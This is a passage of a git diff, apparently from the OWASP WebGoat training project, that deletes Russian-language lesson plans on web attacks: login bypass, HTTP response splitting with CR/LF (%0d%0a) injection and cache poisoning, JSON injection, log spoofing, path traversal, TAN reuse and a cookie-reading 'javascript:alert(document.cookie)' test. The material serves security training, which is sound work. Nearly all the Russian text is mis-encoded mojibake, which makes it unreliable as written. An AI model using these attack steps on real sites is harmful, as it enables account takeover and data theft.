-4. При клике здеÑÑŒ отобразÑÑ‚ÑÑ Ñ‚ÐµÐºÑƒÑ‰Ð¸Ðµ Cookies
-5. При клике здеÑÑŒ отобразÑÑ‚ÑÑ Ñ†ÐµÐ»Ð¸ и задачи текущего урока.
-6. При клике здеÑÑŒ отобразитÑÑ Ð¸Ñходный код урока на Java.
-7. При клике здеÑÑŒ отобразитÑÑ Ñ€ÐµÑˆÐµÐ½Ð¸Ðµ текущего урока.
-8. Ð’ Ñлучае еÑли вы хотите начать урок заново кликите на Ñту ÑÑылку.

-

Решение уроков

-

-Ð’Ñегда начинайте работу по плану текущего урока. ЕÑли вдруг решить урок у Ð²Ð°Ñ Ð½Ð¸ÐºÐ°Ðº не получаетÑÑ, -воÑпользуйтеÑÑŒ подÑказками к нему. Ð’ том Ñлучае, еÑли урок не получаетÑÑ Ñ€ÐµÑˆÐ¸Ñ‚ÑŒ даже Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ подÑказок -вы можете поÑмотреть подробное его решение.

-

Чтение и редактирование параметров

-

-Ð”Ð»Ñ Ñ‡Ñ‚ÐµÐ½Ð¸Ñ Ð¸ Ñ€ÐµÐ´Ð°ÐºÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¿Ð°Ñ€Ð°Ð¼ÐµÑ‚Ñ€Ð¾Ð² вам необходимо иметь локальный прокÑи-Ñервер ÑпоÑобный перехватывать -HTTP-запроÑÑ‹. ЗдеÑÑŒ вы можете иÑпользовать WebScarab. Более подробную информацию о нём вы можете получить в разделе -"ИÑпользуемые инÑтрументы". ПоÑле уÑтановки WebScarab и наÑтройки браузера на работу Ñ Ð½Ð¸Ð¼ можно начинать прохождение уроков. -

-

-Мы Ñтавим галочку в поле "Intercept Request" на закладке "Intercept". ЕÑли мы ÑÐµÐ¹Ñ‡Ð°Ñ Ð¿Ð¾ÑˆÐ»Ñ‘Ð¼ из браузера какой-либо запроÑ, то Ñразу -же поÑвитÑÑ Ð½Ð¾Ð²Ð¾Ðµ окно WebScarab.

-

-ЗдеÑÑŒ мы можем Ñмотреть и редактировать перехватываемые параметры. ПоÑле Ð½Ð°Ð¶Ð°Ñ‚Ð¸Ñ "Accept Changes" Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð¿Ð¾Ð¹Ð´Ñ‘Ñ‚ дальше на Ñервер. -

-

ПроÑмотр и редактирование Cookies

-

-Почти вÑегда редактирование Cookies проиÑходит точно также как и редактирование параметров запроÑа. -Мы можем иÑпользовать WebScarab Ð´Ð»Ñ Ð¿ÐµÑ€ÐµÑ…Ð²Ð°Ñ‚Ð° запроÑа и Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ð¹ имеющихÑÑ Ð² нём Cookies -точно также как опиÑывалоÑÑŒ выше. -

-

-При отправке нового запроÑа поÑвитÑÑ ÑƒÐ¶Ðµ знакомое окно. Ðа Ñкриншоте вы видите где может раÑполагатьÑÑ -Ñтрока Ñ Cookies и как можно редактировать её значение. -

- diff --git a/src/main/webapp/lesson_plans/ru/HtmlClues.html b/src/main/webapp/lesson_plans/ru/HtmlClues.html deleted file mode 100644 index 4272bcabf..000000000 --- a/src/main/webapp/lesson_plans/ru/HtmlClues.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Ðазвание урока: How to Discover Clues in the HTML

-
- -

Concept / Topic To Teach:

- -Многие разработчики, к Ñожалению, забывают удалÑть из рабочих верÑий кода вÑевозможные отметки типа FIXME, TODO, небольшие хаки и Ñ‚.д. - Ð˜ÑÑледование иÑходного кода на наличие различных комментариев , паролей, бÑкдоров и прочего может очень -Ñильно вам помочь. Ðиже предÑтавлена форма авторизации. Попробуйте иÑÑледовать код Ñтраницы и найти -зацепки которые позволÑÑ‚ вам войти как легитимный пользователь. - -
-

ОÑновные цели и задачи:

-Ð’Ñ‹ должны обойти ÑиÑтему авторизации. diff --git a/src/main/webapp/lesson_plans/ru/HttpBasics.html b/src/main/webapp/lesson_plans/ru/HttpBasics.html deleted file mode 100644 index 82fac4497..000000000 --- a/src/main/webapp/lesson_plans/ru/HttpBasics.html +++ /dev/null @@ -1,33 +0,0 @@ -
-

Ðазвание урока: ОÑновы Http

-
- -

Тема изучениÑ:

-Ð’ данном уроке предÑтавлены оÑновы необходимые Ð´Ð»Ñ Ð¿Ð¾Ð½Ð¸Ð¼Ð°Ð½Ð¸Ñ Ð¿Ñ€Ð¾Ñ†ÐµÑÑа передачи данных между браузером и веб-приложением.
-
-

-Как работает HTTP: -

-Ð’Ñе Ð¾Ð±Ñ€Ð°Ñ‰ÐµÐ½Ð¸Ñ Ð¿Ð¾ протоколу HTTP имеют один оÑновной формат. Кажный Ð·Ð°Ð¿Ñ€Ð¾Ñ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ð° или ответ Ñервера ÑоÑтоит из трёх чаÑтей: -Ñтрока запроÑа или ответа, заголовок и тело. Клиент начинает предачу данных Ñледующим образом:
-
- Он ÑоединÑетÑÑ Ñ Ñервером и отправлÑет Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð´Ð»Ñ Ð¿Ð¾Ð»ÑƒÑ‡ÐµÐ½Ð¸Ñ Ð´Ð¾ÐºÑƒÐ¼ÐµÐ½Ñ‚Ð°
-
-
-
    GET /index.html?param=value HTTP/1.0
-Далее он шлёт различную информацию в разделе заголовка чтоб уведомить Ñервер о Ñвоей конфигурации и возможноÑÑ‚ÑÑ… -(например какие кодировки и типы документов поддерживаютÑÑ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ð¾Ð¼).
-
-
    User-Agent: Mozilla/4.06
    Accept: image/gif,image/jpeg, */*
-ПоÑле отправки запроÑа и заголовков клиент может отправить дополнительные данные. Они в большинÑтве Ñлучаев -предназначаютÑÑ Ð´Ð»Ñ CGI-программ иÑпользующих метод POST Ð´Ð»Ñ Ð¿Ñ€Ð¸Ð½ÑÑ‚Ð¸Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ð¸.
-

ОÑновные цели и задачи:

- -Введите ваше Ð¸Ð¼Ñ Ð² поле раÑположенное ниже и нажмите "Вперёд!" Ð´Ð»Ñ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ¸ формы. Сервер примет ваш запроÑ, выÑтроит -полученную Ñтроку в обратном порÑдке и выведет результат на Ñкран. Данный пример иллюÑтрирует оÑновы обработки данных -полученных из HTTP-запроÑа. -

-Пользователю необходимо ознакомитÑÑ Ñ Ð¸Ñпользованием функций WebGoat, таких как проÑмотр подÑказок, отображение параметров HTTP-запроÑа, -отображение Cookies и иÑходных кодов Java. Первое времÑ, в качеÑтве практики, Ð´Ð»Ñ Ð¿Ñ€Ð¾Ñмотра параметров и Cookies -запроÑов вы можете иÑпользовать WebScarab. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/HttpOnly.html b/src/main/webapp/lesson_plans/ru/HttpOnly.html deleted file mode 100644 index 4478b5718..000000000 --- a/src/main/webapp/lesson_plans/ru/HttpOnly.html +++ /dev/null @@ -1,24 +0,0 @@ -
-

Ðазвание урока: Проверка HttpOnly

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб помешать проведению XSS-нападений ÐºÐ¾Ð¼Ð¿Ð°Ð½Ð¸Ñ Microsoft -ввела новый параметр Ð´Ð»Ñ cookies, называемый 'HttpOnly'. ЕÑли данный флаг -активен, то браузер не разрешает работающим на Ñтороне клиента Ñкриптам -получать доÑтуп к cookies. Ðекоторые браузеры, к Ñожалению, не учитывают -наличие 'HttpOnly' в Ñвоей работе. -

СпиÑок браузеров поддерживающих данный параметр можно найти здеÑÑŒ: OWASP HTTPOnly Support -

ОÑновные цели и задачи:

-Ðа данном уроке вы должны проверить, поддерживает ли ваш браузер флаг HTTPOnly применив его к -cookies Ñ Ð¸Ð¼ÐµÐ½ÐµÐ¼ unique2u. -ЕÑли да, то включив его вы не Ñможете получить доÑтуп к их Ñодержимому через -код на клиентÑкой Ñтороне. Ð’Ñ‹ также не Ñможете запиÑывать новые данные в них, или изменÑть -уже имеющиеÑÑ (Ñ…Ð¾Ñ‚Ñ Ð½ÐµÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ðµ браузеры запрещают только Ñчитывание). -Ðо при Ñтом браузер иÑправно будет предавать их Ñерверу. -
-
-Когда вы включите HTTPOnly, находÑÑÑŒ на Ñтранице, cookies домена которой он защищает, -впишите в адреÑную Ñтроку выражение "javascript:alert(document.cookie)". Ð’Ñ‹ увидите табличку Ñо вÑеми -cookies кроме unique2u. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/HttpSplitting.html b/src/main/webapp/lesson_plans/ru/HttpSplitting.html deleted file mode 100644 index 3047f40e1..000000000 --- a/src/main/webapp/lesson_plans/ru/HttpSplitting.html +++ /dev/null @@ -1,47 +0,0 @@ -
-

Ðазвание урока: Проводение атак HTTP Splitting

-
- -

Тема изучениÑ:

-Ðа данном уроке вы ознакомитеÑÑŒ Ñ Ð°Ñ‚Ð°ÐºÐ°Ð¼Ð¸ клаÑÑа HTTP Splitting -
-
-

-Как работают такие атаки: -

-

- Ðтакующий поÑылает веб-Ñерверу вредоноÑные данные вмеÑте Ñ Ð¾Ð¶Ð¸Ð´Ð°ÐµÐ¼Ñ‹Ð¼Ð¸. УÑзвимое приложение не проверÑет полученную -информацию на наличие Ñимволов CR (возврат коретки, обозначаетÑÑ Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ %0d или \r) и LF (перевод Ñтроки, обозначаетÑÑ -Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ %0a или \n). Данные Ñимволы не только позволÑÑŽÑ‚ атакующему контролировать возвращаемые Ñервером заголовки и тело ответа, -но и дают ему возможноÑть Ñоздавать поддельные ответы, Ñодержимое которых будет ему полноÑтью подконтрольно. -

-

- Эффект от таких атак может уÑиливатьÑÑ ÐºÐ¾Ð³Ð´Ð° они проводÑÑ‚ÑÑ Ð²Ð¼ÐµÑте Ñ Ð°Ñ‚Ð°ÐºÐ°Ð¼Ð¸ клаÑÑа "Отравление кеша" (Cache Poisoning). -СмыÑл их в отравлении кеша жертвы по ÑредÑтвам подÑÐ¾Ð²Ñ‹Ð²Ð°Ð½Ð¸Ñ ÐµÐ¹ Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ HTTP Splitting поддельной Ñтраницы, -пришедшей Ñкобы от Ñервера. -

-

-ВмеÑте Ñ Ñтим, Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ уÑзвимоÑтей позволÑющих провеÑти разбиение HTTP-ответа, злоумышленник может заÑтавить Ñервер -отоÑлать клиенту поддельный заголовок Last-Modified: Ñ Ð´Ð°Ñ‚Ð¾Ð¹ из будущего. От Ñтого браузер клиента Ñтанет поÑылать Ñерверу -неверное Ñодержимое в заголовке If-Modified-Since. Сервер, в Ñвою очередь, вÑегда будет отвечать клиенту что (отравленнаÑ) -Ñтраница не изменилаÑÑŒ и клиент поÑтоÑнно будет видеть Ñтраницу подÑунутую злоумышленником. -

-

ПроÑтой пример ответа Ñ ÐºÐ¾Ð´Ð¾Ð¼ 304: -

HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-

-
-

ОÑновные цели и задачи:

- -

Данный урок имеет две Ñтадии. Ðа первой вы изучаете проведение атак HTTP Splitting, а на второй научитеÑÑŒ Ñовмещать -их Ñ Ð¾Ñ‚Ñ€Ð°Ð²Ð»ÐµÐ½Ð¸ÐµÐ¼ кеша.

-

-Введите любой Ñзык в форму поиÑка. ПоÑле отправки формы приложение оÑущеÑтвит переадреÑацию на другую ÑÑылку, -раÑположенную на Ñтом же Ñервере. С помощью Ð¿Ð¾Ð¼ÐµÑ‰ÐµÐ½Ð¸Ñ CR (%0d) и LF (%0a) в название Ñзыка вы должны изучить проведение атак -данного типа. -Ваша цель ÑоÑтоит в том, чтоб заÑтавить Ñервер отправить ответ 200 ОК. ЕÑли Ñодержимое Ñкрана изменитÑÑ Ð¾Ñ‚ вашей атаки, -проÑто перейдите на главную Ñтраницу. Как только шаг 2 будет выполнен уÑпешно вы увидите что в левом меню поÑвилаÑÑŒ Ð½Ð¾Ð²Ð°Ñ -Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ° на против Ñтого раздела. -

- - diff --git a/src/main/webapp/lesson_plans/ru/InsecureLogin.html b/src/main/webapp/lesson_plans/ru/InsecureLogin.html deleted file mode 100644 index 8340c9a06..000000000 --- a/src/main/webapp/lesson_plans/ru/InsecureLogin.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Ðазвание урока: Insecure Login

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -ЧувÑÑ‚Ð²Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ð°Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð½Ð¸ÐºÐ¾Ð³Ð´Ð° не должна поÑылатьÑÑ Ð² виде открытого текÑта! -Многие Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ ÑƒÑтанавливают защищённые ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ñ‚Ð¾Ð»ÑŒÐºÐ¾ поÑле авторизиации. -Это помогает хакерам, в том плане что они могут перехватить отправленные пользователем данные -ещё до уÑтановки им безопаÑного ÑоединениÑ. Ð’ хороших веб-приложениÑÑ… Ð²Ð°Ð¶Ð½Ð°Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ -никогда не передаётÑÑ Ð² открытом виде. -

ОÑновные цели и задачи:

-ПоÑмотрите как легко прочеÑть пароль передающийÑÑ Ð¾Ñ‚ÐºÑ€Ñ‹Ñ‚Ñ‹Ð¼ текÑтом. Так вы
-лучше поймёте преимущеÑтва передачи информации по защищённому Ñоединению. - diff --git a/src/main/webapp/lesson_plans/ru/JSONInjection.html b/src/main/webapp/lesson_plans/ru/JSONInjection.html deleted file mode 100644 index 583c3fc85..000000000 --- a/src/main/webapp/lesson_plans/ru/JSONInjection.html +++ /dev/null @@ -1,25 +0,0 @@ -
-

Ðазвание урока: Выполнение атак клаÑÑа 'JSON-инъекциÑ'

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Ðа данном уроке вы научитеÑÑŒ оÑущеÑтвлÑть атаки клаÑÑа 'JSON-инъекциÑ' -
-
-

-Как работают такие атаки: -

-JSON - Ñто проÑтой, "легковеÑный" и Ñффективный формат передачи данных. Данные, -передаваемые Ñ ÐµÐ³Ð¾ помощью, могут иметь различные формы. Ðапример Ñто может быть маÑÑив, ÑпиÑок, хеш-таблица и Ñ‚.д. -JSON обычно иÑпользуетÑÑ Ð² AJAX- и Web2.0-приложениÑÑ…, поÑтепенно вытеÑнÑÑ XML за Ñчёт Ñвоей проÑтоты и ÑкороÑти обработки. -Ð’ то же Ð²Ñ€ÐµÐ¼Ñ JSON, как и XML, предраÑположен к атакам инъективного клаÑÑа. Ðапример злоумышленник может перехватить ответ -Ñервера и внедрить в него произвольные данные. - -
-

ОÑновные цели и задачи:

- -* Ð’Ñ‹ летите из БоÑтона, Ñ Ð°Ñропорта Ñ ÐºÐ¾Ð´Ð¾Ð¼ BOS, в СиÑтл, в аÑропорт Ñ ÐºÐ¾Ð´Ð¾Ð¼ SEA.
-* Когда вы введёте трёхзначные коды аÑропортов, на Ñервер, ÑредÑтвами AJAX, уйдёт Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð¾ цене билета.
-* Вам Ñообщат что еÑть два доÑтупных варианта - один без оÑтановок, а второй Ñ Ð´Ð²ÑƒÐ¼Ñ Ð¾Ñтановками.
-* Ваша задача попытатьÑÑ Ð·Ð°ÐºÐ°Ð·Ð°Ñ‚ÑŒ билет без оÑтановок за цену билета Ñ Ð´Ð²ÑƒÐ¼Ñ Ð¾Ñтановками. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/JavaScriptValidation.html b/src/main/webapp/lesson_plans/ru/JavaScriptValidation.html deleted file mode 100644 index 20ac321ac..000000000 --- a/src/main/webapp/lesson_plans/ru/JavaScriptValidation.html +++ /dev/null @@ -1,22 +0,0 @@ -
-

Ðазвание урока: Обход валидации данных реализованной на клиентÑкой Ñтороне Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ JavaScript

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Проверку данных, реализованную на клиентÑкой Ñтороне, не Ñтоит раÑÑматривать -как какой-то механизм повышающий безопаÑноÑть приложениÑ. Она лишь призвана Ñократить -количеÑтво неверных данных обрабатываемых Ñервером, которые могут поÑтупать от проÑтых -пользователей не знающих правильный формат определённых полей. Ðтакующие могут -легко обойти такие механизмы множеÑтвом ÑпоÑобов. ПоÑтому проверка вводимой информации на клиентÑкой Ñтороне -обÑзательно должна иметь Ñвои аналог на Ñерверной чаÑти приложениÑ. Это Ñильно Ñнизит возможноÑть -Ð¿Ð¾Ð¿Ð°Ð´Ð°Ð½Ð¸Ñ Ð² важные механизмы Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ð¿Ð°Ñных данных. - -
-

ОÑновные цели:

-Ðа Ñтом уроке веб-Ñайт проверÑет Ñодержимое формы Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ определённых механизмов. -Ваша цель обойти их и отправить форму Ñ Ñ‚Ð°ÐºÐ¸Ð¼Ð¸ данными, которых Ñайт не ожидает. -
- -Ðа данном Ñайте реализована проверка поÑтупающих данных и на клиентÑкой, и на Ñерверной Ñтороне. -Вашей задачей ÑвлÑетÑÑ Ð½Ð°Ñ€ÑƒÑˆÐµÐ½Ð¸Ðµ работы клиентÑкого механизма проверки и отправка Ñайту неожиданной -Ð´Ð»Ñ Ð½ÐµÐ³Ð¾ информации. Ð’Ñ‹ должны нарушить работу вÑех 7 валидаторов. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html b/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html deleted file mode 100644 index 66293a95c..000000000 --- a/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html +++ /dev/null @@ -1,17 +0,0 @@ -
-

Lesson Plan Title:

-
- -

Concept / Topic To Teach:

-

Standards Addressed:

-

General Goal(s):

-

Specific Objectives:

-

Required Materials:

-

Anticipatory Set (Lead-In):

-

Step-By-Step Procedures:

-

Plan For Independent Practice:

-

Closure (Reflect Anticipatory Set):

-

Assessment Based On Objectives:

-

Extensions (For Gifted Students):

-

Possible Connections To Other Subjects:

- \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/LogSpoofing.html b/src/main/webapp/lesson_plans/ru/LogSpoofing.html deleted file mode 100644 index 544b2bf23..000000000 --- a/src/main/webapp/lesson_plans/ru/LogSpoofing.html +++ /dev/null @@ -1,20 +0,0 @@ -
-

Ðазвание урока: Подделка запиÑей в лог-файлах.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- Ðа Ñтом уроке раÑÑматриваетÑÑ Ð¿Ñ€Ð¾Ñтой обман человечеÑких глаз. -
-
-

-Как работает данный тип атак: -Целью Ñтих атак ÑвлÑетÑÑ Ð¿Ð¾Ð´Ð´ÐµÐ»ÐºÐ° запиÑей лог-файла за Ñчёт Ð¿Ð¾Ð¼ÐµÑ‰ÐµÐ½Ð¸Ñ Ð² него Ñпециально Ñформированной Ñтроки. -Это позволит атакующему запутать админиÑтратора и Ñкрыть Ñвои Ñледы. -

-
-

ОÑновные цели:

- -* Ð’ Ñером поле, раÑположенном ниже, отображаетÑÑ Ñодержимое которое будет в неÑено в лог-файл.
-* Вашей целью ÑвлÑетÑÑ Ñоздание такой запиÑи, в которой Ñообщено будто пользователь "admin" вошёл уÑпешно
-* Кроме Ñтого попробуйте помеÑтить в лог-файл какую-нибудь JS-вÑтавку. - diff --git a/src/main/webapp/lesson_plans/ru/MultiLevelLogin1.html b/src/main/webapp/lesson_plans/ru/MultiLevelLogin1.html deleted file mode 100644 index 464a1bac0..000000000 --- a/src/main/webapp/lesson_plans/ru/MultiLevelLogin1.html +++ /dev/null @@ -1,19 +0,0 @@ -
-

Ðазвание урока: ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ 1

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¾Ð±ÐµÑпечиваетÑÑ Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ð¼ дополнительного варианта -проверки пользователÑ. Ðапример, поÑле того как вы зайдёте под Ñвоим именем и паролем, при -Ñовершении важной операции приложение может попроÑить Ð²Ð°Ñ ÑƒÐºÐ°Ð·Ð°Ñ‚ÑŒ идентификационный номер транзакции (TAN). -Обычно такие Ñхемы иÑпользуютÑÑ Ð² онлайн-банкинге. Банк даёт вам ÑпиÑок допуÑтимых -номеров транзакций которые уникальны Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента. Один TAN может быть иÑпользован -только один раз. Кроме того, TAN может отправлÑтьÑÑ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ñƒ по SMS. Ð’ данном Ñлучае -упор делаетÑÑ Ð½Ð° то, что злоумышленнику очень трудно узнать номера транзакций имеющиеÑÑ -у пользователÑ. - -

ОÑновные цели и задачи:

-Ð’ данном уроке вы должны иÑÑледовать похожую ÑиÑтема аутентификации. -Из иÑходных данных у Ð²Ð°Ñ ÐµÑть Ð¸Ð¼Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ, пароль и -уже иÑпользованые TAN. Ð’Ñ‹ должны узнать принимает ли Ñервер номера транзакций Ñтавшие недейÑтвительными. - diff --git a/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html b/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html deleted file mode 100644 index 7d77f76d9..000000000 --- a/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html +++ /dev/null @@ -1,17 +0,0 @@ -
-

Ðазвание урока: ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ 2

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -ÐœÐ½Ð¾Ð³Ð¾ÑƒÑ€Ð¾Ð²Ð½ÐµÐ²Ð°Ñ Ð°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¾Ð±ÐµÑпечиваетÑÑ Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ð¼ дополнительного варианта -проверки пользователÑ. Ðапример, поÑле того как вы зайдёте под Ñвоим именем и паролем, при -Ñовершении важной операции приложение может попроÑить Ð²Ð°Ñ ÑƒÐºÐ°Ð·Ð°Ñ‚ÑŒ идентификационный номер транзакции (TAN). -Обычно такие Ñхемы иÑпользуютÑÑ Ð² онлайн-банкинге. Банк даёт вам ÑпиÑок допуÑтимых -номеров транзакций которые уникальны Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента. Один TAN может быть иÑпользован -только один раз. Кроме того, TAN может отправлÑтьÑÑ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ñƒ по SMS. Ð’ данном Ñлучае -упор делаетÑÑ Ð½Ð° то, что злоумышленнику очень трудно узнать номера транзакций имеющиеÑÑ -у пользователÑ. -

ОÑновные цели и задачи:

-У Ð²Ð°Ñ ÑƒÐ¶Ðµ еÑть аккаунт Ð´Ð»Ñ ÑиÑтемы 'WebGoat Financial', но вам нужно -войти под другим аккаунтом Ð·Ð½Ð°Ñ Ð»Ð¸ÑˆÑŒ его логин. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/NewLesson.html b/src/main/webapp/lesson_plans/ru/NewLesson.html deleted file mode 100644 index 04197bd54..000000000 --- a/src/main/webapp/lesson_plans/ru/NewLesson.html +++ /dev/null @@ -1,13 +0,0 @@ - - -

Создание уроков WebGoat

-

-ДобавлÑть уроки в WebGoat очень проÑто. ЕÑли у Ð²Ð°Ñ ÐµÑть Ñ…Ð¾Ñ€Ð¾ÑˆÐ°Ñ Ð¸Ð´ÐµÑ
-Ð´Ð»Ñ Ð½Ð¾Ð²Ð¾Ð³Ð¾ урока, Ñледуйте Ñтой проÑтой инÑтрукции чтоб реалиовать её:

-* Скачайте иÑходный код здеÑÑŒ.

-* УÑтановите фреймворк: Ñледуйте проÑтым инÑтрукциÑм в "HOW TO create the WebGoat workspace.txt" (данный файл поÑтавлÑетÑÑ Ð²Ð¼ÐµÑте Ñ WebGoat).

-* Вам необходимо добавить 2 файла Ñ Ñодержимым вашего урока:
-  - YourLesson.java в org.owasp.webgoat.lessons
-  - YourLesson.html в WebContent/lesson_plans

- - diff --git a/src/main/webapp/lesson_plans/ru/PasswordStrength.html b/src/main/webapp/lesson_plans/ru/PasswordStrength.html deleted file mode 100644 index 4b0e5044a..000000000 --- a/src/main/webapp/lesson_plans/ru/PasswordStrength.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Ðазвание урока: СтойкоÑть паролÑ

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ðккаунты защищены на Ñтолько, на Ñколько защищены их пароли. Многие пользователи -везде ÑтремÑÑ‚ÑÑ Ð¸Ñпользовать Ñамые проÑтые варианты паролей. ЕÑли вы хотите защитить их от атаки методом проÑтого -перебора (brute-force), вам Ñледует предъÑвлÑть к ним Ñерьёзные требованиÑ. ПользовательÑкий пароль обÑзательно должен Ñодержать -как минимум буквы верхнего и нижнего региÑтров и цифры. Чем длиннее пароль, тем лучше. - -
-

ОÑновные цели и задачи:

- Попробуйте проверить неÑколько иÑпользуемых вами паролей на ÑтойкоÑть вот на Ñтом ÑервиÑе - https://howsecureismypassword.net/ \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html deleted file mode 100644 index 7c69d6e1c..000000000 --- a/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html +++ /dev/null @@ -1,11 +0,0 @@ -
-

Ðазвание урока: Обход Ñхем ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа оÑнованных на путÑÑ… файловой ÑиÑтемы.

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ð’ Ñхемах ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа оÑнованных на путÑÑ… файловой ÑиÑтемы атакующий может попытатьÑÑ Ð¿ÐµÑ€ÐµÐ´Ð°Ñ‚ÑŒ приложению -отноÑительный путь, вмеÑто ожидаемых данных, Ð´Ð»Ñ Ð¾Ð±Ñ…Ð¾Ð´Ð° ограничений безопаÑноÑти. Следовательно, злоумышленник может -получить доÑтуп к файлам, которые находÑÑ‚ÑÑ Ð²Ð½Ðµ текущей директории и к которым при нормальной работе Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ð±Ñ€Ð°Ñ‰Ð°Ñ‚ÑŒÑÑ Ð½ÐµÐ»ÑŒÐ·Ñ. - -

ОÑновные цели и задачи:

-Пользователь должен получить доÑтуп к файлу, находÑщемуÑÑ Ð²Ð½Ðµ текущей директории. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/Phishing.html b/src/main/webapp/lesson_plans/ru/Phishing.html deleted file mode 100644 index a983d8e29..000000000 --- a/src/main/webapp/lesson_plans/ru/Phishing.html +++ /dev/null @@ -1,17 +0,0 @@ -
-

Ðазвание урока: Фишинг, оÑнованный на применении XSS

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

